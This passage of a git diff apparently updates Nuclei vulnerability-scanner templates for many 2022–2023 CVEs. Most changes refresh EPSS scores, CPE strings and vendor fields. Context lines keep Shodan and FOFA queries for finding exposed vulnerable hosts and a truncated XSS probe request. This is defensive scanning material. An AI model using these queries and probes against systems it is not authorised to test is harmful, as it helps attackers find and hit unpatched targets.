shodan-query: http.favicon.hash:-582931176
diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml
index 5e7031c472..e71a21493a 100644
--- a/http/cves/2022/CVE-2022-46934.yaml
+++ b/http/cves/2022/CVE-2022-46934.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00076
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.31252
metadata:
max-request: 1
shodan-query: http.html:"kkFileView"
diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml
index 08cae1b326..096cca517f 100644
--- a/http/cves/2022/CVE-2022-47002.yaml
+++ b/http/cves/2022/CVE-2022-47002.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-47002
cwe-id: CWE-863
- epss-score: 0.02633
+ epss-score: 0.03141
cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89824
metadata:
max-request: 3
shodan-query: 'Generator: Masa CMS'
diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml
index 142f17aa17..5780dbdd47 100644
--- a/http/cves/2022/CVE-2022-47003.yaml
+++ b/http/cves/2022/CVE-2022-47003.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-47003
cwe-id: CWE-863
- epss-score: 0.01124
+ epss-score: 0.01777
cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86482
metadata:
max-request: 3
shodan-query: 'Generator: Musa CMS'
diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml
index 324b75aa4e..c03384020e 100644
--- a/http/cves/2022/CVE-2022-47615.yaml
+++ b/http/cves/2022/CVE-2022-47615.yaml
@@ -9,17 +9,24 @@ info:
reference:
- https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2022-47615
+ - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
+ cve-id: CVE-2022-47615
cwe-id: CWE-434
+ epss-score: 0.00837
+ cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79914
metadata:
max-request: 1
publicwww-query: "/wp-content/plugins/learnpress"
verified: true
+ framework: wordpress
+ vendor: thimpress
+ product: learnpress
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi
-
http:
- raw:
- |
diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml
index 259ce17e5e..0985cd8777 100644
--- a/http/cves/2022/CVE-2022-47945.yaml
+++ b/http/cves/2022/CVE-2022-47945.yaml
@@ -15,8 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47945
+ cwe-id: CWE-22
epss-score: 0.05688
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92344
metadata:
max-request: 2
fofa-query: header="think_lang"
diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml
index aa04a38e9c..7a5bc9ee85 100644
--- a/http/cves/2022/CVE-2022-47966.yaml
+++ b/http/cves/2022/CVE-2022-47966.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47966
- epss-score: 0.97439
+ epss-score: 0.97467
cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99939
metadata:
max-request: 1
shodan-query: title:"ManageEngine"
diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml
index 1be59cb4a3..c45306c3bf 100644
--- a/http/cves/2022/CVE-2022-47986.yaml
+++ b/http/cves/2022/CVE-2022-47986.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-47986
cwe-id: CWE-502
- epss-score: 0.92526
+ epss-score: 0.93666
cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98767
metadata:
max-request: 1
shodan-query: html:"Aspera Faspex"
diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml
index a56ec38dca..e47ee8d3ce 100644
--- a/http/cves/2022/CVE-2022-48012.yaml
+++ b/http/cves/2022/CVE-2022-48012.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:*
+ epss-percentile: 0.26092
metadata:
max-request: 3
shodan-query: title:"opencats"
diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml
index 169d98867a..d593f5c83f 100644
--- a/http/cves/2022/CVE-2022-48165.yaml
+++ b/http/cves/2022/CVE-2022-48165.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-48165
cwe-id: CWE-284
- epss-score: 0.08683
+ epss-score: 0.04725
cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:*
+ epss-percentile: 0.91602
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1350437236
diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml
index 621b2d3720..e7dff63c1b 100644
--- a/http/cves/2022/CVE-2022-4897.yaml
+++ b/http/cves/2022/CVE-2022-4897.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00261
cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.63049
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml
index 3db1f4d7b5..f44059ffd3 100644
--- a/http/cves/2023/CVE-2023-0099.yaml
+++ b/http/cves/2023/CVE-2023-0099.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml
index b82ee1eeae..58f98dd937 100644
--- a/http/cves/2023/CVE-2023-0126.yaml
+++ b/http/cves/2023/CVE-2023-0126.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-0126
cwe-id: CWE-22
- epss-score: 0.02342
+ epss-score: 0.03359
cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*
+ epss-percentile: 0.90145
metadata:
max-request: 1
shodan-query: title:"Appliance Management Console Login"
diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml
index 24ce6496d0..524b343c1d 100644
--- a/http/cves/2023/CVE-2023-0236.yaml
+++ b/http/cves/2023/CVE-2023-0236.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml
index 2b7bbe87e7..307a05371d 100644
--- a/http/cves/2023/CVE-2023-0261.yaml
+++ b/http/cves/2023/CVE-2023-0261.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2023-0261
cwe-id: CWE-89
- epss-score: 0.00697
+ epss-score: 0.01065
cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8235
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 84dce1297f..fdfcee5b18 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-0297
cwe-id: CWE-94
- epss-score: 0.35759
+ epss-score: 0.32256
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96441
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml
index 029d675d3f..6d32978356 100644
--- a/http/cves/2023/CVE-2023-0448.yaml
+++ b/http/cves/2023/CVE-2023-0448.yaml
@@ -6,16 +6,25 @@ info:
severity: medium
description: |
The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
- remediation: Fixed in version 4.3 and above
reference:
- https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
- https://nvd.nist.gov/vuln/detail/CVE-2023-0448
+ remediation: Fixed in version 4.3 and above
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
cve-id: CVE-2023-0448
+ cwe-id: CWE-79
+ epss-score: 0.00064
+ cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/wp-helper-lite"
+ framework: wordpress
+ vendor: matbao
+ product: wp_helper_premium
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite
http:
diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml
index 9286a34dc0..6811957124 100644
--- a/http/cves/2023/CVE-2023-0514.yaml
+++ b/http/cves/2023/CVE-2023-0514.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29093
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml
index 63055a8114..9dc604d39e 100644
--- a/http/cves/2023/CVE-2023-0527.yaml
+++ b/http/cves/2023/CVE-2023-0527.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-0527
cwe-id: CWE-79
- epss-score: 0.00582
+ epss-score: 0.00779
cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79143
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml
index 67d3ae5981..e29f4a3f1e 100644
--- a/http/cves/2023/CVE-2023-0552.yaml
+++ b/http/cves/2023/CVE-2023-0552.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.0007
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.28777
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml
index 58a840d532..9490023057 100644
--- a/http/cves/2023/CVE-2023-0562.yaml
+++ b/http/cves/2023/CVE-2023-0562.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-0562
cwe-id: CWE-89
- epss-score: 0.01095
+ epss-score: 0.01124
cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82821
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml
index 68e7165ac9..676a95a9c3 100644
--- a/http/cves/2023/CVE-2023-0563.yaml
+++ b/http/cves/2023/CVE-2023-0563.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 4.8
cve-id: CVE-2023-0563
cwe-id: CWE-79
- epss-score: 0.00474
+ epss-score: 0.00563
cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.74832
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml
index 845514a5ee..7bc16a393c 100644
--- a/http/cves/2023/CVE-2023-0630.yaml
+++ b/http/cves/2023/CVE-2023-0630.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.03477
cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90291
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml
index 8d69afb3f2..04db2bfb26 100644
--- a/http/cves/2023/CVE-2023-0669.yaml
+++ b/http/cves/2023/CVE-2023-0669.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2023-0669
cwe-id: CWE-502
- epss-score: 0.96397
+ epss-score: 0.96578
cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99443
metadata:
max-request: 1
shodan-query: http.favicon.hash:1484947000
diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml
index 7ae22dd029..02d27d3301 100644
--- a/http/cves/2023/CVE-2023-0942.yaml
+++ b/http/cves/2023/CVE-2023-0942.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-0942
cwe-id: CWE-79
- epss-score: 0.00264
+ epss-score: 0.00374
cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.69277
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml
index 0860309ea7..4ea8e9b927 100644
--- a/http/cves/2023/CVE-2023-0948.yaml
+++ b/http/cves/2023/CVE-2023-0948.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29093
metadata:
max-request: 2
verified: "true"
diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml
index 9225a58cde..3023622ffc 100644
--- a/http/cves/2023/CVE-2023-0968.yaml
+++ b/http/cves/2023/CVE-2023-0968.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-0968
cwe-id: CWE-79
- epss-score: 0.00485
+ epss-score: 0.00283
cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.64533
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml
index 8ad99ce27f..be84fef3d0 100644
--- a/http/cves/2023/CVE-2023-1020.yaml
+++ b/http/cves/2023/CVE-2023-1020.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-1020
cwe-id: CWE-89
- epss-score: 0.04513
+ epss-score: 0.06484
cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92801
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml
index 0359bc81e9..9de25d9e09 100644
--- a/http/cves/2023/CVE-2023-1080.yaml
+++ b/http/cves/2023/CVE-2023-1080.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-1080
cwe-id: CWE-79
- epss-score: 0.00485
+ epss-score: 0.00283
cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.64533
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml
index f0884ebe98..1f50185e5f 100644
--- a/http/cves/2023/CVE-2023-1177.yaml
+++ b/http/cves/2023/CVE-2023-1177.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-1177
cwe-id: CWE-29
- epss-score: 0.00859
+ epss-score: 0.01497
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85238
metadata:
max-request: 3
shodan-query: http.title:"mlflow"
diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml
index f4a76a14c0..3a787e038c 100644
--- a/http/cves/2023/CVE-2023-1362.yaml
+++ b/http/cves/2023/CVE-2023-1362.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-1021
epss-score: 0.00071
cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:*
+ epss-percentile: 0.29038
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml
index 5e059dd716..5e70e362a8 100644
--- a/http/cves/2023/CVE-2023-1454.yaml
+++ b/http/cves/2023/CVE-2023-1454.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.03351
cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:*
+ epss-percentile: 0.90132
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml
index 43dd2b0299..19f0264ff5 100644
--- a/http/cves/2023/CVE-2023-1496.yaml
+++ b/http/cves/2023/CVE-2023-1496.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0007
cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
+ epss-percentile: 0.28688
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml
index f8135aa886..5b7bc71254 100644
--- a/http/cves/2023/CVE-2023-1546.yaml
+++ b/http/cves/2023/CVE-2023-1546.yaml
@@ -6,15 +6,24 @@ info:
severity: medium
description: |
The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
- remediation: Fixed in version 2.124
reference:
- https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
- https://nvd.nist.gov/vuln/detail/CVE-2023-1546
+ remediation: Fixed in version 2.124
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
cve-id: CVE-2023-1546
+ cwe-id: CWE-79
+ epss-score: 0.00071
+ cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29093
metadata:
max-request: 2
verified: true
+ framework: wordpress
+ vendor: plainviewplugins
+ product: mycryptocheckout
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated
http:
@@ -25,7 +34,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"> HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml
index 85e54309f5..1fcfc4ac58 100644
--- a/http/cves/2023/CVE-2023-1671.yaml
+++ b/http/cves/2023/CVE-2023-1671.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-1671
cwe-id: CWE-77
- epss-score: 0.2507
+ epss-score: 0.31251
cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96403
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml
index 966560ba12..ca2c9c7950 100644
--- a/http/cves/2023/CVE-2023-1698.yaml
+++ b/http/cves/2023/CVE-2023-1698.yaml
@@ -3,20 +3,26 @@ id: CVE-2023-1698
info:
name: WAGO - Remote Command Execution
author: xianke
- severity: high
+ severity: critical
description: |
In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
reference:
- https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1698
+ - https://cert.vde.com/en/advisories/VDE-2023-007/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1698
cwe-id: CWE-78
+ epss-score: 0.59767
+ cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97319
metadata:
max-request: 1
shodan-query: html:"/wbm/" html:"wago"
+ vendor: wago
+ product: compact_controller_100_firmware
tags: cve,cve2023,wago,rce
http:
diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml
index 271e70a9a8..faf56c185d 100644
--- a/http/cves/2023/CVE-2023-1730.yaml
+++ b/http/cves/2023/CVE-2023-1730.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-1730
cwe-id: CWE-89
- epss-score: 0.04513
+ epss-score: 0.06484
cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92801
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml
index 038e4b783d..db613b42cd 100644
--- a/http/cves/2023/CVE-2023-1835.yaml
+++ b/http/cves/2023/CVE-2023-1835.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-1835
cwe-id: CWE-79
- epss-score: 0.00079
+ epss-score: 0.00071
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29093
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml
index 5d7d6d503f..37a8665942 100644
--- a/http/cves/2023/CVE-2023-1890.yaml
+++ b/http/cves/2023/CVE-2023-1890.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-1890
cwe-id: CWE-79
- epss-score: 0.00079
+ epss-score: 0.00157
cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.5154
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml
index d40edc018f..59182f4869 100644
--- a/http/cves/2023/CVE-2023-20073.yaml
+++ b/http/cves/2023/CVE-2023-20073.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-20073
cwe-id: CWE-434
+ epss-score: 0.55732
cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
- epss-score: 0.0014
+ epss-percentile: 0.97213
metadata:
fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
max-request: 3
@@ -26,7 +27,6 @@ info:
vendor: cisco
verified: true
tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive
-
variables:
html_comment: "" # Random string as HTML comment to append in response body
@@ -71,9 +71,8 @@ http:
internal: true
dsl:
- body_1
-
matchers:
- type: word
part: body_3
words:
- - "{{html_comment}}"
\ No newline at end of file
+ - "{{html_comment}}"
diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml
index 55746378eb..4972e3da54 100644
--- a/http/cves/2023/CVE-2023-2023.yaml
+++ b/http/cves/2023/CVE-2023-2023.yaml
@@ -16,13 +16,14 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-2023
cwe-id: CWE-79
- epss-score: 0.00079
- cpe: cpe:2.3:a:custom_404_pro_project:custom_404_pro:*:*:*:*:*:wordpress:*:*
+ epss-score: 0.00171
+ cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.535
metadata:
max-request: 2
verified: true
framework: wordpress
- vendor: custom_404_pro_project
+ vendor: kunalnagar
product: custom_404_pro
tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive
diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml
index 58bbd00f7d..0668b84b1c 100644
--- a/http/cves/2023/CVE-2023-20864.yaml
+++ b/http/cves/2023/CVE-2023-20864.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-20864
cwe-id: CWE-502
- epss-score: 0.06575
+ epss-score: 0.10253
cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94193
metadata:
max-request: 2
shodan-query: title:"vRealize Log Insight"
diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml
index e97b791bac..35c75695b4 100644
--- a/http/cves/2023/CVE-2023-20887.yaml
+++ b/http/cves/2023/CVE-2023-20887.yaml
@@ -11,13 +11,15 @@ info:
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
- https://github.com/sinsinology/CVE-2023-20887
+ - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-20887
cwe-id: CWE-77
- epss-score: 0.71431
+ epss-score: 0.96066
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99263
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml
index 6170f3cc4c..090dc83153 100644
--- a/http/cves/2023/CVE-2023-20888.yaml
+++ b/http/cves/2023/CVE-2023-20888.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-502
epss-score: 0.0799
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93437
metadata:
verified: true
shodan-query: title:"VMware Aria Operations"
diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml
index 72dce5703b..55159124e1 100644
--- a/http/cves/2023/CVE-2023-20889.yaml
+++ b/http/cves/2023/CVE-2023-20889.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-20889
cwe-id: CWE-77
- epss-score: 0.00609
+ epss-score: 0.02153
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87886
metadata:
verified: true
shodan-query: title:"VMware Aria Operations"
diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml
index 6691f77695..7f5efdd9b9 100644
--- a/http/cves/2023/CVE-2023-2122.yaml
+++ b/http/cves/2023/CVE-2023-2122.yaml
@@ -16,9 +16,15 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-2122
cwe-id: CWE-79
+ epss-score: 0.00071
+ cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29286
metadata:
max-request: 2
verified: "true"
+ framework: wordpress
+ vendor: 10web
+ product: image_optimizer
tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated
http:
diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml
index 5c577cf475..be769e69aa 100644
--- a/http/cves/2023/CVE-2023-2130.yaml
+++ b/http/cves/2023/CVE-2023-2130.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-2130
cwe-id: CWE-89
- epss-score: 0.01206
+ epss-score: 0.01557
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85582
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml
